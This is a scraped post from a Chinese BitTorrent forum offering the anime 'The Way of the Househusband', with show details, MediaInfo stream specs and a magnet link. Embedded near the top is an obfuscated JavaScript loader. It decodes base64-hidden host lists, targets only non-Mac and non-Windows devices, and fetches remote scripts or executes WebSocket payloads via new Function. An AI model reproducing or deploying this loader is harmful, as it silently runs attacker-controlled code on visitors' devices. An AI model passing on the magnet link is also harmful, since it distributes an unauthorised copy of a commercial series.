[极主夫道][全10集][日英双语内封简繁多国软字幕.无水印][WEB-MKV][1080P][TEPES][网飞版][BT下载]

版主小s 14天前 144

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};


◎译  名 极主夫道 / Gokushufudo / The Way of The Househusband / 极道主夫

◎片  名 極主夫道

◎年  代 2021

◎产  地 日本

◎类  别 剧情 / 动画

◎语  言 日语

◎上映日期 2021-04-08(日本)

◎豆瓣评分 7.6/10 from 5957 users

◎豆瓣链接 https://movie.douban.com/subject/35235191

◎集  数 10

◎片  长 18分钟

◎导  演 今千秋 Chiaki Kon

◎主  演 津田健次郎 Kenjirô Tsuda

       伊藤静 Shizuka Ito

       兴津和幸 Kazuyuki Okitsu

       市道真央 Mao Ichimichi


◎标  签 日本 | 动画 | 搞笑泡面 | 喜剧 | 动漫 | Netflix | 日本动画 | 2021


◎简  介


  主人公被称作“不死之龙”(传闻中一晚上可以单枪匹马毁掉对手整整十处地盘传说中的黑帮老大)。曾是黑帮老大,现为家庭主夫。因为曾是黑道人士的经历影响,遣词用句时常带有道上人的风格,容易让人感到畏惧、恐怖,脑补与误解,甚至闹出不少笑话。女子力很高,无论家务、手工装修、装潢、料理等都很擅长,让人感觉什么事都很能干。



Video
ID : 1
Format : AVC
Format/Info : Advanced Video Codec
Format profile : [email protected]
Format settings : CABAC / 3 Ref Frames
Format settings, CABAC : Yes
Format settings, Reference frames : 3 frames
Codec ID : V_MPEG4/ISO/AVC
Duration : 19 min 27 s
Bit rate mode : Variable
Bit rate : 4 757 kb/s
Nominal bit rate : 6 046 kb/s
Maximum bit rate : 11.2 Mb/s
Width : 1 920 pixels
Height : 1 080 pixels
Display aspect ratio : 16:9
Frame rate mode : Constant
Frame rate : 23.976 (24000/1001) FPS
Color space : YUV
Chroma subsampling : 4:2:0
Bit depth : 8 bits
Scan type : Progressive
Bits/(Pixel*Frame) : 0.096
Stream size : 662 MiB (79%)
Writing library : x264 core 148 r2722 1b0121b
Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=23 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=6046 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=11250 / vbv_bufsize=15000 / nal_hrd=vbr / filler=0 / ip_ratio=1.40 / aq=1:1.00
Language : Japanese
Default : Yes
Forced : No

Audio #1
ID : 2
Format : E-AC-3
Format/Info : Enhanced AC-3
Commercial name : Dolby Digital Plus
Codec ID : A_EAC3
Duration : 19 min 27 s
Bit rate mode : Constant
Bit rate : 640 kb/s
Channel(s) : 6 channels
Channel layout : L R C LFE Ls Rs
Sampling rate : 48.0 kHz
Frame rate : 31.250 FPS (1536 SPF)
Compression mode : Lossy
Stream size : 89.1 MiB (11%)
Language : Japanese
Service kind : Complete Main
Default : Yes
Forced : No

Audio #2
ID : 3
Format : E-AC-3
Format/Info : Enhanced AC-3
Commercial name : Dolby Digital Plus
Codec ID : A_EAC3
Duration : 19 min 27 s
Bit rate mode : Constant
Bit rate : 640 kb/s
Channel(s) : 6 channels
Channel layout : L R C LFE Ls Rs
Sampling rate : 48.0 kHz
Frame rate : 31.250 FPS (1536 SPF)
Compression mode : Lossy
Stream size : 89.1 MiB (11%)
Language : English
Service kind : Complete Main
Default : No
Forced : No


......


Text #32
ID : 35
Format : UTF-8
Codec ID : S_TEXT/UTF8
Codec ID/Info : UTF-8 Plain Text
Duration : 18 min 33 s
Bit rate : 79 b/s
Count of elements : 340
Stream size : 10.8 KiB (0%)
Title : Simplified
Language : Chinese
Default : No
Forced : No

Text #33
ID : 36
Format : UTF-8
Codec ID : S_TEXT/UTF8
Codec ID/Info : UTF-8 Plain Text
Duration : 18 min 33 s
Bit rate : 82 b/s
Count of elements : 340
Stream size : 11.2 KiB (0%)
Title : Traditional
Language : Chinese
Default : No
Forced : No


TAGS 剧情 动画

磁力链:
  • magnet:?xt=urn:btih:C9D9FAE8B4EBA2D8E25D2F40F599023F7CE6F780
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回